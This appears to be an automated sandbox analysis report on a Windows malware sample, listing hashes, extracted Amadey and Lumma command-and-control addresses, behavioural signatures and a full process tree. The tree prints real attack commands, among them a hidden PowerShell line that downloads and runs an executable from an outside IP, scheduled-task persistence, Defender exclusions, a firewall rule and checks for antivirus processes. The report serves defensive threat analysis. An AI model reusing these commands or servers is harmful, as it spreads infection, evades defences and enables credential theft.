Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/03/2025, 15:33

General

  • Target

    2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    18f57c1c2b52c8e57ad2967f414a9eee

  • SHA1

    b01f393735971db5b092b03e029af81d4d9a1ce9

  • SHA256

    a44e5617ebb702b13cbc3c74c5551cd0fe3be0401fcdc577dc6bb41fcc4249ba

  • SHA512

    c527e9f869173e7a3644fffc0a10694fe94ea5b3335e05150544abd634e4be17917c2925364d5d8e7ef54999a29cad06e6081678bfcd120f2c26c0693741ee49

  • SSDEEP

    24576:vqDEvCTbMWu7rQYlBQcBiT6rprG8a0Ru:vTvC/MTQYxsWR7a0R

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://grodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://cspacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://cosmosyf.top/GOsznj

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://triplooqp.world/APowko

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://apixtreev.run/LkaUz

https://tsparkiob.digital/KeASUp

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 26 IoCs
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 59 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 24 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Windows directory 31 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2940
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3924
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:6924
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2364
    • C:\Users\Admin\AppData\Local\Temp\2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:5788
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn QZ1xFmandLu /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZXkeRmELE.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4920
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn QZ1xFmandLu /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZXkeRmELE.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4344
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\ZXkeRmELE.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:224
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5488
          • C:\Users\Admin\AppData\Local\Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE
            "C:\Users\Admin\AppData\Local\Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1528
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:5580
              • C:\Users\Admin\AppData\Local\Temp\10394600101\18f71bf7e7.exe
                "C:\Users\Admin\AppData\Local\Temp\10394600101\18f71bf7e7.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5216
                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe
                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4196
                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exe
                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exe
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5752
              • C:\Users\Admin\AppData\Local\Temp\10394640101\amnew.exe
                "C:\Users\Admin\AppData\Local\Temp\10394640101\amnew.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4016
                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5928
                  • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                    "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1584
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      9⤵
                        PID:5460
                    • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                      "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4440
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        9⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4812
                    • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                      "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:4464
                      • C:\Users\Admin\AppData\Local\Temp\is-IUNDU.tmp\Bell_Setup16.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-IUNDU.tmp\Bell_Setup16.tmp" /SL5="$B027E,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:3852
                        • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                          "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                          10⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:984
                          • C:\Users\Admin\AppData\Local\Temp\is-L7805.tmp\Bell_Setup16.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-L7805.tmp\Bell_Setup16.tmp" /SL5="$C027E,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                            11⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            PID:4400
                            • C:\Windows\SysWOW64\regsvr32.exe
                              "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                              12⤵
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6124
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                13⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4016
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
                                "PowerShell.exe" -NoProfile -NonInteractive -Command -
                                13⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1612
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                13⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4672
                    • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                      "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:4564
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5332
                      • C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                        9⤵
                        • Executes dropped EXE
                        PID:5304
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:804
                    • C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe
                      "C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5344
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        9⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5676
                    • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                      "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4504
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        9⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4672
                    • C:\Users\Admin\AppData\Local\Temp\10046340101\466cf5974c.exe
                      "C:\Users\Admin\AppData\Local\Temp\10046340101\466cf5974c.exe"
                      8⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in Windows directory
                      PID:756
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
                        9⤵
                          PID:4556
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist
                            10⤵
                            • Enumerates processes with tasklist
                            • System Location Discovery: System Language Discovery
                            PID:4196
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr /I "opssvc wrsa"
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:5220
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist
                            10⤵
                            • Enumerates processes with tasklist
                            • System Location Discovery: System Language Discovery
                            PID:1524
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:1032
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c md 674187
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:4812
                          • C:\Windows\SysWOW64\extrac32.exe
                            extrac32 /Y /E Funky.wbk
                            10⤵
                              PID:3528
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr /V "Und" Tournament
                              10⤵
                                PID:3112
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:1264
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:384
                              • C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
                                Constraints.com r
                                10⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:5440
                              • C:\Windows\SysWOW64\choice.exe
                                choice /d y /t 5
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:1372
                          • C:\Users\Admin\AppData\Local\Temp\10046450101\14c7c5e718.exe
                            "C:\Users\Admin\AppData\Local\Temp\10046450101\14c7c5e718.exe"
                            8⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:1112
                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                              "C:\Users\Admin\AppData\Local\Temp\10046450101\14c7c5e718.exe"
                              9⤵
                              • Downloads MZ/PE file
                              • Executes dropped EXE
                              PID:4184
                          • C:\Users\Admin\AppData\Local\Temp\10046460101\44d2247657.exe
                            "C:\Users\Admin\AppData\Local\Temp\10046460101\44d2247657.exe"
                            8⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:1908
                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                              "C:\Users\Admin\AppData\Local\Temp\10046460101\44d2247657.exe"
                              9⤵
                              • Downloads MZ/PE file
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:1124
                      • C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe
                        "C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4932
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                          7⤵
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:2888
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:5656
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                          7⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          PID:3680
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 496
                            8⤵
                            • Program crash
                            PID:1072
                      • C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe
                        "C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:3976
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          7⤵
                          • Drops startup file
                          • Adds Run key to start application
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2204
                          • C:\Windows\SysWOW64\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "MSBuild" /tr "C:\Users\Admin\AppData\Roaming\MSBuild.exe"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:4452
                      • C:\Users\Admin\AppData\Local\Temp\10395660101\851cc55f77.exe
                        "C:\Users\Admin\AppData\Local\Temp\10395660101\851cc55f77.exe"
                        6⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5960
                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                          "C:\Users\Admin\AppData\Local\Temp\10395660101\851cc55f77.exe"
                          7⤵
                          • Downloads MZ/PE file
                          • Executes dropped EXE
                          PID:1720
                      • C:\Users\Admin\AppData\Local\Temp\10395670101\b3b3a25713.exe
                        "C:\Users\Admin\AppData\Local\Temp\10395670101\b3b3a25713.exe"
                        6⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4380
                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                          "C:\Users\Admin\AppData\Local\Temp\10395670101\b3b3a25713.exe"
                          7⤵
                          • Downloads MZ/PE file
                          • Executes dropped EXE
                          PID:3444
                      • C:\Users\Admin\AppData\Local\Temp\10395680101\ZzvSz9G.exe
                        "C:\Users\Admin\AppData\Local\Temp\10395680101\ZzvSz9G.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:5524
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          7⤵
                          • System Location Discovery: System Language Discovery
                          PID:5664
                      • C:\Users\Admin\AppData\Local\Temp\10395690101\1Hoz3Kt.exe
                        "C:\Users\Admin\AppData\Local\Temp\10395690101\1Hoz3Kt.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4536
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                          7⤵
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:5616
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            8⤵
                              PID:4004
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                              8⤵
                                PID:8692
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                              7⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • System Location Discovery: System Language Discovery
                              PID:5824
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 496
                                8⤵
                                • Program crash
                                PID:7260
                          • C:\Users\Admin\AppData\Local\Temp\10395700101\29010300ef.exe
                            "C:\Users\Admin\AppData\Local\Temp\10395700101\29010300ef.exe"
                            6⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • System Location Discovery: System Language Discovery
                            PID:5480
                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe
                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe
                              7⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4696
                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exe
                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exe
                              7⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1248
                          • C:\Users\Admin\AppData\Local\Temp\10395710101\gLLOqKC.exe
                            "C:\Users\Admin\AppData\Local\Temp\10395710101\gLLOqKC.exe"
                            6⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:4460
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:380
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe"
                                8⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:8408
                                • C:\Users\Admin\AppData\Local\Temp\f9827b8d90\tgvazx.exe
                                  "C:\Users\Admin\AppData\Local\Temp\f9827b8d90\tgvazx.exe"
                                  9⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:8608
                          • C:\Users\Admin\AppData\Local\Temp\10395730101\nAM5wkr.exe
                            "C:\Users\Admin\AppData\Local\Temp\10395730101\nAM5wkr.exe"
                            6⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • Modifies registry class
                            PID:2676
                            • C:\Windows\SYSTEM32\CMD.exe
                              "CMD" netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" WindowsControl ENABLE & exit
                              7⤵
                                PID:2492
                              • C:\Windows\SYSTEM32\cmd.exe
                                "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST & exit
                                7⤵
                                  PID:3228
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST
                                    8⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2184
                                • C:\Windows\SYSTEM32\cmd.exe
                                  "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST & exit
                                  7⤵
                                    PID:5448
